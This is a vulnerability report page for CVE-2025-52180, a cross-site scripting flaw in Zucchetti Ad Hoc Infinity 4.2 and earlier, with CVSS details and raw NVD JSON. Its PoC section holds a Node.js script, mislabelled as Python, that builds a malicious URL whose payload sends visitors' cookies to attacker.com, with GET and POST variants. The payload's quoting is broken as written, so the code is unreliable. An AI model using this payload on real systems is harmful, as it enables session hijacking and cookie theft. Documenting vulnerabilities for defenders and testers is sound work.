Security Vulnerability Report
中文
CVE-2025-52180 CVSS 6.1 MEDIUM

CVE-2025-52180

Published: 2025-10-30 19:16:27
Last Modified: 2025-12-22 15:15:46

Description

Cross-site scripting (XSS) vulnerability in Zucchetti Ad Hoc Infinity 4.2 and earlier allows remote unauthenticated attackers to inject arbitrary JavaScript via the pHtmlSource parameter of the /ahi/jsp/gsfr_feditorHTML.jsp?pHtmlSource endpoint.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:zucchetti:ad_hoc_infinity:*:*:*:*:*:*:*:* - VULNERABLE
Zucchetti Ad Hoc Infinity <= 4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-52180 XSS PoC for Zucchetti Ad Hoc Infinity // Target: /ahi/jsp/gsfr_feditorHTML.jsp?pHtmlSource parameter const axios = require('axios'); const targetUrl = 'http://target.com/ahi/jsp/gsfr_feditorHTML.jsp'; // XSS payload - steals cookie const xssPayload = '<img src=x onerror="fetch(`https://attacker.com/log?c="+document.cookie)">'; // Construct malicious URL const maliciousUrl = `${targetUrl}?pHtmlSource=${encodeURIComponent(xssPayload)}`; console.log('[*] CVE-2025-52180 XSS PoC'); console.log(`[*] Target: ${targetUrl}`); console.log(`[*] Malicious URL: ${maliciousUrl}`); // Simulate sending the request axios.get(maliciousUrl) .then(response => { console.log('[+] Payload sent successfully'); console.log('[+] When victim visits the page, cookie will be exfiltrated'); }) .catch(err => { console.error('[-] Error:', err.message); }); // Alternative: Direct form submission async function sendViaPOST() { const formData = new URLSearchParams(); formData.append('pHtmlSource', xssPayload); await axios.post(targetUrl, formData); console.log('[+] POST payload sent successfully'); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52180", "sourceIdentifier": "[email protected]", "published": "2025-10-30T19:16:27.430", "lastModified": "2025-12-22T15:15:45.917", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting (XSS) vulnerability in Zucchetti Ad Hoc Infinity 4.2 and earlier allows remote unauthenticated attackers to inject arbitrary JavaScript via the pHtmlSource parameter of the /ahi/jsp/gsfr_feditorHTML.jsp?pHtmlSource endpoint."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zucchetti:ad_hoc_infinity:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.2", "matchCriteriaId": "0DA0408F-7370-4A8E-A893-26A8A843441E"}]}]}], "references": [{"url": "https://gist.github.com/alex-xor/8d0f9f456e6840a955889305ea789ef8", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zucchetti.it/", "source": "[email protected]", "tags": ["Product"]}]}}